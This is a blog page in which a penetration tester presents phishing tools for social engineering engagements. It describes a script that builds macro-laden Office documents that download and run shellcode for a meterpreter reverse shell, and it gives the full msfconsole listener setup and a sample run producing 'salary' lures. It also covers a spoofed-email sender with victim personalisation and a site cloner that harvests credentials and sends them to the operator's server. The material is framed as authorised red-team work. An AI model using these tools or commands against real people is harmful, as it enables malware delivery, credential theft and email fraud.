Archive

Posts Tagged ‘Social Engineering’

Phishing Toys

February 1, 2016 Leave a comment

I wrote 2 scripts with the help of a co-worker that are useful in our social engineering engagements.

  • injectShell.py – This script generates Microsoft documents (VBA code) that uses Powershell to get a meterpreter reverse shell. This script works on a Linux/Mac machine unlike some scripts I found which requires a Windows machine. This works by patching the hex bytes (ip address and port) in the pre-generated office documents.
  • sendEmail.py – This script is useful in sending spoofed emails to some SMTP servers.

 

Check the below link for the Github repository
https://github.com/milo2012/Social-Engineering-Toys

 

 injectShell.py

The script generates office documents (xls, doc and ppt) that includes VBA code that downloads and run the Invoke-Shellcode.ps1 (creates a meterpreter reverse shell back to server) when the victim enables Macro in the document.

You will need to run the windows/meterpreter/reverse_https payload on your the attacker host.

$ ./msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST consulting.example.org
msf exploit(handler) > set LPORT 4443
msf exploit(handler) > set SessionCommunicationTimeout 0
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

Below is the help screen of the script.

$  python injectShell.py -h
usage: injectShell.py [-h] [-t T] [-o O] [-ip IP] [-port PORT]

optional arguments:
  -h, --help  show this help message and exit
  -t T        [xls|doc|ppt|all]
  -o O        [output filename (without extension)]
  -ip IP      [meterpreter listener ip address]
  -port PORT  [meterpreter listener port]

Below is the script in action.

$  python injectShell.py -t all -o salary -ip 192.168.1.6 -port 1111 
- Generated: salary.xls
- Generated: salary.doc
- Generated: salary.ppt

sendEmail.py
This script is useful in sending spoofed emails to some SMTP servers. This can be useful in social engineering engagements.

Below is the help screen of the script.

$ python sendEmail.py -h
usage: sendEmail.py [-h] [-f F] [-n N] [-e E] [-t T] [-iL IL] [-v]

optional arguments:
  -h, --help  show this help message and exit
  -f F        [html file containing the email body]
  -n N        [recipient name]
  -e E        [recipient email]
  -t T        [delay between 1 to x seconds (random)]
  -iL IL      [file containing recipient name and email addresses per line
              separated by comma]
  -v          [verbose]

Below is the script in action.

$ python sendEmail.py -iL namelist.txt -f sampleHtml.txt -t 10
Sending email to: test01@example.com  

You can use keywords like @trackingCode and @user in HTML emails which will be replaced by the values listed in namelist.txt. (See sampleHTML.txt for an example of the usage of two keywords)

  • @user is the victim’s name (1st field in namelist.txt)
  • @trackingCode is the individual codes assigned to per victim email address in Phishing Frenzy (3rd field in namelist.txt)

Below are two sample formats of namelist.txt
Below is sample 1
The fields are separated by “,”
The first field is: recipient’s name
The second field is: recipient’s email address

Keith,keith123@hotmail.com

Below is sample 2
The first field is: recipient’s name
The second field is: recipient’s email address
The last field is: tracking code

Keith,keith123@hotmail.com,UAG21E
Advertisements

Easily clone sites and import as Phishing Frenzy templates (Phishing for passwords)

January 22, 2016 Leave a comment

Phishing Frenzy is an awesome tool to use during Social Engineering/Spear Phishing exercises.

One of the tasks that I spent a lot of time on when using Phishing Frenzy is the ‘cloning of a website’ to be used for phishing passwords.

Phishing Frenzy does have a ‘Website Cloner’ but its pretty basic and some work needs to be done on the generated HTML file before it can be used as a template. (e.g. modify the input name of the username and password fields, changing the form action URL, create the template.yml and attachments.yml and zip up the files).

I wrote a simple script to take the URL of the website you want to clone (along with other information like Phishing Frenzy server URL and the ‘fake domain name/public IP address of the server hosting the cloned website’) and generates a working template zip that you can import directly into Phishing Frenzy under Templates > Restore menu.

Hope this can be of help to anyone of you in future social engineering engagements.

Below is a screenshot of the script in action.

phishing frenzy template zip generator

When a user visits and keys in the credentials into the cloned website, the credentials will be recorded into the creds.log file and also sent to your phishing frenzy server .

You can find the python scripts at https://github.com/milo2012/phishing-frenzy-template-cloner
Thank you for reading.

Updates:  I have update the template to include browser plugin enumeration via Javascript. This should be useful for some. The information is sent back to your Phishing Frenzy server.